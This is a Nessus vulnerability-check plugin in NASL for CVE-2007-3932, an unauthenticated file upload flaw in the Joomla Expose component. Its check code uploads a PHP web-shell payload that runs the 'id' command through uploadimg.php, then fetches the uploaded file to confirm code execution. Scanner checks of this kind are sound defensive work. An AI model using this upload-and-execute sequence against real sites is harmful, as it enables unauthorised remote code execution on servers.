#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that allows for arbitrary
file uploads. 

Description :

The remote host is running Expose, a third-party component for Joomla
for Flash galleries. 

The version of Expose installed on the remote host not only allows
unauthenticated access but also fails to validate the type of files
uploaded.  An attacker can exploit these issues to upload files with
arbitrary code and then execute them on the remote host, subject to
the permissions of the web server user id. 

See also :

http://www.milw0rm.com/exploits/4194
http://joomlacode.org/gf/project/expose/news/?action=NewsThreadView&id=441

Solution :

Apply the security patch according to the vendor advisory referenced
above. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25736);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-3932");
  script_bugtraq_id(24958);

  script_name(english:"Joomla Expose Component Arbitrary File Upload Vulnerability");
  script_summary(english:"Checks whether arbitrary file uploads are possible");

  script_description(english:desc);

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("joomla_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/joomla"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];
  url = string(dir, "/administrator/components/com_expose/uploadimg.php");

  # Make sure the affected script exists.
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does...
  if ('form method="post" action="uploadimg.php"' >< res)
  {
    # Try to upload a file that will execute a command.
    cmd = "id";
    # nb: if safe checks are enabled, move_uploaded_file() will fail.
    if (safe_checks()) fname = "/";
    else fname = string(SCRIPT_NAME, "-", unixtime(), ".php");

    boundary = "nessus";
    req = string(
      "POST ",  url, " HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
      "Content-Type: multipart/form-data; boundary=", boundary, "\r\n"
      # nb: we'll add the Content-Length header and post data later.
    );
    boundary = string("--", boundary);
    postdata = string(
      boundary, "\r\n", 
      'Content-Disposition: form-data; name="userfile"; filename="', fname, '"', "\r\n",
      "Content-Type: application/octet-stream\r\n",
      "\r\n",
      '<?php system(', cmd, ");  ?>\r\n",

      boundary, "--", "\r\n"
    );
    req = string(
      req,
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # If safe checks are enabled...
    if (safe_checks())
    {
      # There's a problem if we get a message that the upload failed.
      if ("<script>alert('Error uploading')" >< res)
      {
        report = string(
          desc,
          "\n\n",
          "Plugin output :\n",
          "\n",
          "Nessus did not actually upload a file because safe checks were enabled,\n",
          "but the remote install does appear to be invalid."
        );
        security_hole(port:port, data:report);
      }
    }
    else {
      pat = string("File uploaded to \\.\\./\\.\\./\\.\\.(.+)", fname);
      url2 = NULL;
      matches = egrep(pattern:pat, string:res);
      if (matches)
      {
        foreach match (split(matches))
        {
          match = chomp(match);
          url2 = eregmatch(pattern:pat, string:match);
          if (!isnull(url2))
          {
            url2 = string(dir, url2[1], fname);
            break;
          }
        }
      }
      if (isnull(url2)) exit(0);

      # Now try to execute the script.
      req = http_get(item:url2, port:port);
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);
    
      # There's a problem if...
      if (
        # the output looks like it's from id or...
        egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res) ||
        # PHP's disable_functions prevents running system().
        egrep(pattern:"Warning.+\(\) has been disabled for security reasons", string:res)
      )
      {
        if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res))
          report = string(
            desc,
            "\n\n",
            "Plugin output :\n",
            "\n",
            "Nessus was able to execute the command '", cmd, "' on the remote host,\n",
            "which produced the following output :\n",
            "\n",
            res
          );
        else report = desc;

        security_hole(port:port, data:report);
        exit(0);
      }
    }
  }
}
